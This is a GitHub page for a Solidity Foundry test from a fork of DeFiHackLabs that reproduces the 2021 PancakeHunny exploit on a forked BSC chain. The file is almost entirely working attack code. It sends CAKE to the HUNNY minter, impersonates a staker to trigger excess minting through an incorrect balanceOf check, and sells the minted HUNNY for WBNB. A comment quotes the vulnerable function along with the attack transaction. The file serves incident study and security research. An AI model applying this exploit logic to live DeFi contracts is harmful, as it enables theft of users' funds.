forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
PancakeHunny_exp.sol
82 lines (63 loc) · 3.15 KB
/
PancakeHunny_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./interface.sol";
/*
Vulnerable contract: https://bscscan.com/address/0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300#code
Attack TX: https://bscscan.com/tx/0x765de8357994a206bb90af57dcf427f48a2021f2f28ca81f2c00bc3b9842be8e
Attacker contract: 0xb9b0090aaa81f374d66d94a8138d80caa2002950
Vulnerable code snippet:
function mintFor(address flip, uint _withdrawalFee, uint _performanceFee, address to, uint) override external onlyMinter {
uint feeSum = _performanceFee.add(_withdrawalFee);
IBEP20(flip).safeTransferFrom(msg.sender, address(this), feeSum);
uint hunnyBNBAmount = tokenToHunnyBNB(flip, IBEP20(flip).balanceOf(address(this))); // incorrect use balanceOf.
*/
interface CakeFlipVault {
function getReward() external;
function withdraw(uint256 amount) external;
function rewards(address) external view returns (uint256);
}
contract ContractTest is DSTest {
CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
IPancakeRouter pancakeRouter =
IPancakeRouter(payable(0x10ED43C718714eb63d5aA57B78B54704E256024E));
address hunnyMinter = 0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300;
CakeFlipVault cakeVault = CakeFlipVault(0x12180BB36DdBce325b3be0c087d61Fce39b8f5A4);
IWBNB wbnb = IWBNB(payable(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c));
IERC20 cake = IERC20(0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82);
IERC20 hunny = IERC20(0x565b72163f17849832A692A3c5928cc502f46D69);
constructor() {
cheat.createSelectFork(
"bsc",
7962338
); //fork bsc at block 7962338
wbnb.approve(address(pancakeRouter), type(uint256).max);
hunny.approve(address(pancakeRouter), type(uint256).max);
}
function testExploit() public {
wbnb.deposit{ value: 5.752 ether }();
wbnb.transfer(address(this), 5.752 ether);
//WBNB was swapped to CAKE at PancakeSwap
address[] memory path = new address[](2);
path[0] = address(wbnb);
path[1] = address(cake);
pancakeRouter.swapExactETHForTokens{value: 5.752 ether}(0,path,address(this),1622687689);
emit log_named_decimal_uint("Swap cake, Cake Balance", cake.balanceOf(address(this)),18);
//The attacker sent CAKE to our HUNNY Minter contract
cake.transfer(hunnyMinter,59880957483227401400);
//The attacker staked on CAKE-BNB Hive in PancakeHunny
cheat.startPrank(0x515Fb5a7032CdD688B292086cf23280bEb9E31B6);
//HUNNY Minter was “tricked” to mint more HUNNY tokens
cakeVault.getReward();
hunny.transfer(address(this),hunny.balanceOf(address(0x515Fb5a7032CdD688B292086cf23280bEb9E31B6)));
emit log_named_decimal_uint("Hunny Balance", hunny.balanceOf(address(this)),18);
cheat.stopPrank();
//The attacker then sold the HUNNY tokens on PancakeSwap
address[] memory path2 = new address[](2);
path2[0] = address(hunny);
path2[1] = address(wbnb);
pancakeRouter.swapExactTokensForETH(hunny.balanceOf(address(this)),0,path2,address(this),1622687089);
emit log_named_decimal_uint("Swap WBNB, WBEB Balance", wbnb.balanceOf(address(this)),18);
}
receive() external payable {}
}